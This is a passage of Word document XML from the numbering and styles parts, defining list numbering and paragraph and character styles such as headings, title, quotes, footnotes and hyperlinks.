        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="000000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000000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00000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000000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000000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0000000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00000010"/>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nsid w:val="000000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00000012"/>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nsid w:val="00000013"/>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nsid w:val="00000014"/>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nsid w:val="000000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0000001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2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>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0"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2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SimSun" w:eastAsia="SimSun" w:hAnsi="Calibri"/>
        <w:lang w:val="en-US" w:bidi="ar-SA" w:eastAsia="en-US"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:before="100" w:after="200" w:lineRule="auto" w:line="276"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:type="paragraph" w:default="1" w:styleId="style0">
    <w:name w:val="Normal"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:pPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4097"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="5b9bd5"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="5b9bd5"/>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="5b9bd5"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="5b9bd5"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="5b9bd5"/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="ffffff"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4098"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="deeaf6"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="deeaf6"/>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="deeaf6"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="deeaf6"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="deeaf6"/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4099"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="2" w:color="5b9bd5"/>
      </w:pBdr>
      <w:spacing w:before="300" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="1f4d78"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4100"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="dotted" w:sz="6" w:space="2" w:color="5b9bd5"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4101"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="5b9bd5"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4102"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="dotted" w:sz="6" w:space="1" w:color="5b9bd5"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4103"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4104"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4105"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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5690eb2a-7562-4e53-98d0-9cd24a418eae"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4097"/>
    <w:link w:val="style1"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="ffffff"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="5b9bd5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4098">
    <w:name w:val="Heading 2 Char_8451ce7b-40f6-4f34-b21a-d9dfa5572753"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4098"/>
    <w:link w:val="style2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:spacing w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="deeaf6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4099">
    <w:name w:val="Heading 3 Char_4b69cd8f-f2f9-45fd-a11f-809871180de5"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4099"/>
    <w:link w:val="style3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="1f4d78"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4100">
    <w:name w:val="Heading 4 Char_08ff0026-9997-4af2-89a0-1dbf4f441e94"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4100"/>
    <w:link w:val="style4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4101">
    <w:name w:val="Heading 5 Char_35117f60-ff0e-4abf-97c2-e422368baabe"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4101"/>
    <w:link w:val="style5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4102">
    <w:name w:val="Heading 6 Char_5f48b1cd-32e3-49ed-ad27-6a182ad8c8ee"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4102"/>
    <w:link w:val="style6"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4103">
    <w:name w:val="Heading 7 Char_57981670-aee2-47c5-b1d0-9f94604ab17a"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4103"/>
    <w:link w:val="style7"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="2e74b5"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4104">
    <w:name w:val="Heading 8 Char_7d91793d-06fc-4b22-ba51-26de4bd0c175"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4104"/>
    <w:link w:val="style8"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4105">
    <w:name w:val="Heading 9 Char_87ea8ef9-b48b-4c99-9722-c32eddfd57d0"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4105"/>
    <w:link w:val="style9"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:spacing w:val="10"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style62">
    <w:name w:val="Title"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4106"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:caps/>
      <w:color w:val="5b9bd5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4106">
    <w:name w:val="Title Char_5f76bc5c-1f42-4de9-9345-86938894f183"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4106"/>
    <w:link w:val="style62"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:cs="SimSun" w:eastAsia="SimSun" w:hAnsi="Calibri Light"/>
      <w:caps/>
      <w:color w:val="5b9bd5"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style74">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4107"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="500" w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:caps/>
      <w:color w:val="595959"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4107">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4107"/>
    <w:link w:val="style74"/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="595959"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style260">
    <w:name w:val="Subtle Emphasis"/>
    <w:next w:val="style260"/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1f4d78"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style88">
    <w:name w:val="Emphasis"/>
    <w:next w:val="style88"/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="1f4d78"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style261">
    <w:name w:val="Intense Emphasis"/>
    <w:next w:val="style261"/>
    <w:qFormat/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="1f4d78"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style87">
    <w:name w:val="Strong"/>
    <w:next w:val="style87"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style180">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4108"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4108">
    <w:name w:val="Quote Char_dbe82a95-bb22-4636-964e-6394049f4985"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4108"/>
    <w:link w:val="style180"/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style181">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4109"/>
    <w:qFormat/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:lineRule="auto" w:line="240"/>
      <w:ind w:left="1080" w:right="1080"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="5b9bd5"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4109">
    <w:name w:val="Intense Quote Char_c1fa8da8-4428-4675-92af-883bb4acea4f"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4109"/>
    <w:link w:val="style181"/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:color w:val="5b9bd5"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style262">
    <w:name w:val="Subtle Reference"/>
    <w:next w:val="style262"/>
    <w:qFormat/>
    <w:uiPriority w:val="31"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5b9bd5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style263">
    <w:name w:val="Intense Reference"/>
    <w:next w:val="style263"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="5b9bd5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style264">
    <w:name w:val="Book Title"/>
    <w:next w:val="style264"/>
    <w:qFormat/>
    <w:uiPriority w:val="33"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style85">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style85"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="1f4e79"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style86">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style86"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="954f72"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style34">
    <w:name w:val="caption"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:qFormat/>
    <w:uiPriority w:val="35"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2e74b5"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style153">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style153"/>
    <w:link w:val="style4110"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:cs="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4110">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4110"/>
    <w:link w:val="style153"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:cs="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style84">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style84"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="2" w:space="10" w:color="5b9bd5" w:shadow="true" w:frame="true"/>
        <w:right w:val="single" w:sz="2" w:space="10" w:color="5b9bd5" w:shadow="true" w:frame="true"/>
        <w:top w:val="single" w:sz="2" w:space="10" w:color="5b9bd5" w:shadow="true" w:frame="true"/>
        <w:bottom w:val="single" w:sz="2" w:space="10" w:color="5b9bd5" w:shadow="true" w:frame="true"/>
      </w:pBdr>
      <w:ind w:left="1152" w:right="1152"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1f4e79"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style81">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style81"/>
    <w:link w:val="style4111"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4111">
    <w:name w:val="Body Text 3 Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4111"/>
    <w:link w:val="style81"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style83">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style83"/>
    <w:link w:val="style4112"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4112">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4112"/>
    <w:link w:val="style83"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style39">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style39"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style30">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style30"/>
    <w:link w:val="style4113"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4113">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4113"/>
    <w:link w:val="style30"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style106">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="style30"/>
    <w:next w:val="style30"/>
    <w:link w:val="style4114"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4114">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="style4113"/>
    <w:next w:val="style4114"/>
    <w:link w:val="style106"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style89">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style89"/>
    <w:link w:val="style4115"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:cs="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4115">
    <w:name w:val="Document Map Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4115"/>
    <w:link w:val="style89"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:cs="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style43">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style43"/>
    <w:link w:val="style4116"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4116">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4116"/>
    <w:link w:val="style43"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style37">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style37"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style29">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style29"/>
    <w:link w:val="style4117"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4117">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4117"/>
    <w:link w:val="style29"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style98">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style98"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style100">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style100"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style101">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style101"/>
    <w:link w:val="style4118"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4118">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4118"/>
    <w:link w:val="style101"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style103">
    <w:name w:val="HTML Typewriter"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style103"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style45">
    <w:name w:val="macro"/>
    <w:next w:val="style45"/>
    <w:link w:val="style4119"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="480"/>
        <w:tab w:val="left" w:leader="none" w:pos="960"/>
        <w:tab w:val="left" w:leader="none" w:pos="1440"/>
        <w:tab w:val="left" w:leader="none" w:pos="1920"/>
        <w:tab w:val="left" w:leader="none" w:pos="2400"/>
        <w:tab w:val="left" w:leader="none" w:pos="2880"/>
        <w:tab w:val="left" w:leader="none" w:pos="3360"/>
        <w:tab w:val="left" w:leader="none" w:pos="3840"/>
        <w:tab w:val="left" w:leader="none" w:pos="4320"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4119">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4119"/>
    <w:link w:val="style45"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style90">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style90"/>
    <w:link w:val="style4120"/>
    <w:uiPriority w:val="99"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4120">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4120"/>
    <w:link w:val="style90"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="style156">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style156"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="3b3838"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style31">
    <w:name w:val="header"/>
    <w:basedOn w:val="style0"/>
